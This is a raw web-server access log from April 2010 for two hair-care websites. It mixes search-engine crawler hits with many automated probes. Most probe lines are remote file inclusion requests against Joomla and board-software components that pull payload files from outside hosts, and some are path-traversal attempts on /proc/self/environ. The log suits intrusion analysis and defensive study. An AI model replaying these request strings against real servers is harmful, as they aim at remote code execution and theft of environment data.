66.59.48.68 - - [26/Apr/2010:06:39:11 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:25 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:25 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:27 -0700] "GET /logs/access_100405.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.59.48.68 - - [26/Apr/2010:06:39:31 -0700] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:40:09 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:40:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15155 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
62.219.11.2 - - [26/Apr/2010:06:41:54 -0700] "GET /components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:41:54 -0700] "GET /logs/access_100419.log//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:41:54 -0700] "GET /logs//components/$option/rssfactory.functions.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:06:41:56 -0700] "GET /logs/access_100412.log%20%20//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:43:16 -0700] "GET /logs//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:43:16 -0700] "GET /components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.11.2 - - [26/Apr/2010:06:43:16 -0700] "GET /logs/access_100419.log//components/$option/overlib.config.php?mosConfig.absolute.path=http://www.americinn.com//email-images/images/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:06:43:46 -0700] "GET /logs/access.log%20%20//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:46:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13969 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:48:58 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:48:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:48:58 -0700] "GET /skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:03 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:04 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:49:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:52:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13107 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.201.66.81 - - [26/Apr/2010:06:52:40 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
91.201.66.81 - - [26/Apr/2010:06:52:40 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:06:53:02 -0700] "GET /logs/access_090928.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:06:56:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:56:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:56:04 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:56:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:56:06 -0700] "GET /skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:06:56:06 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://www.frontiergeosciences.com/files/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:06:56:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15179 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:06:59:38 -0700] "GET /logs/access_100412.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:06:59:38 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:06:59:38 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:06:59:41 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
91.201.66.41 - - [26/Apr/2010:07:00:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
91.201.66.41 - - [26/Apr/2010:07:00:27 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:00:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14603 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:07:01:37 -0700] "GET /logs/access_100419.log//classes/Tar.php?mosConfig.absolute.path=/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:05:07 -0700] "GET /logs/access_091026.log HTTP/1.1" 200 562644 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:05:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12844 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
96.249.250.110 - - [26/Apr/2010:07:05:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
96.249.250.110 - - [26/Apr/2010:07:05:42 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:10:14 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:10:14 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:10:14 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:07:11:38 -0700] "GET /logs/access_091012.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:07:14:11 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:07:14:12 -0700] "GET /logs/access_091130.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:07:14:12 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:07:14:38 -0700] "GET /logs/access_091207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cielecran.com//assets/images/rs1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.9.156.236 - - [26/Apr/2010:07:14:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:16:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15136 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
88.165.81.34 - - [26/Apr/2010:07:20:28 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.165.81.34 - - [26/Apr/2010:07:20:28 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.165.81.34 - - [26/Apr/2010:07:20:29 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.251.103.3 - - [26/Apr/2010:07:22:10 -0700] "GET /logs/access_091123.log//components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
125.251.103.3 - - [26/Apr/2010:07:22:11 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
125.251.103.3 - - [26/Apr/2010:07:22:12 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:07:23:06 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 589584 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:25:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12912 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.9.156.236 - - [26/Apr/2010:07:28:15 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:28:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:28:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:31:30 -0700] "GET /logs/access_100419.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:31:30 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:31:30 -0700] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:34:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15033 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.9.156.236 - - [26/Apr/2010:07:34:25 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:07:35:15 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:35:15 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:35:15 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:07:37:27 -0700] "GET /logs/access.log HTTP/1.1" 200 216416 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:38:46 -0700] "GET /logs/access_100412.log/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:38:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:38:46 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:40:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13152 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.92 - - [26/Apr/2010:07:42:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
119.235.237.92 - - [26/Apr/2010:07:42:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15148 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:07:43:12 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:07:43:13 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:07:43:14 -0700] "GET /logs/ver2/bbs/write_comment_update.php//bbs//write_comment_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:07:43:14 -0700] "GET /ver2/bbs/write_comment_update.php//bbs//write_comment_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:07:43:14 -0700] "GET /logs/access_100412.log%20%20/ver2/bbs/write_comment_update.php//bbs//write_comment_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:07:43:15 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.9.156.236 - - [26/Apr/2010:07:43:25 -0700] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
68.233.9.242 - - [26/Apr/2010:07:44:24 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
68.233.9.242 - - [26/Apr/2010:07:44:24 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
68.233.9.242 - - [26/Apr/2010:07:44:25 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:47:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18720 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
88.165.81.34 - - [26/Apr/2010:07:48:48 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.41 - - [26/Apr/2010:07:51:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6431 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:07:51:18 -0700] "GET /logs/access_100405.log/ver2/bbs/write_comment_update.php//bbs//write_comment_update.php?board_skin_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:51:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7737 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:07:53:57 -0700] "GET /logs/access_100412.log%20%20//include.php?path[docroot]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:07:53:57 -0700] "GET /include.php?path[docroot]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.28.134 - - [26/Apr/2010:07:53:58 -0700] "GET /logs//include.php?path[docroot]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:54:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8267 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.45.145.92 - - [26/Apr/2010:07:55:52 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.92 - - [26/Apr/2010:07:55:53 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.92 - - [26/Apr/2010:07:55:53 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /logs/access_100208.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /logs/access_100208.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:01 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:06 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:06 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:06 -0700] "GET /logs/access_100104.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:24 -0700] "GET /logs/access_100104.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
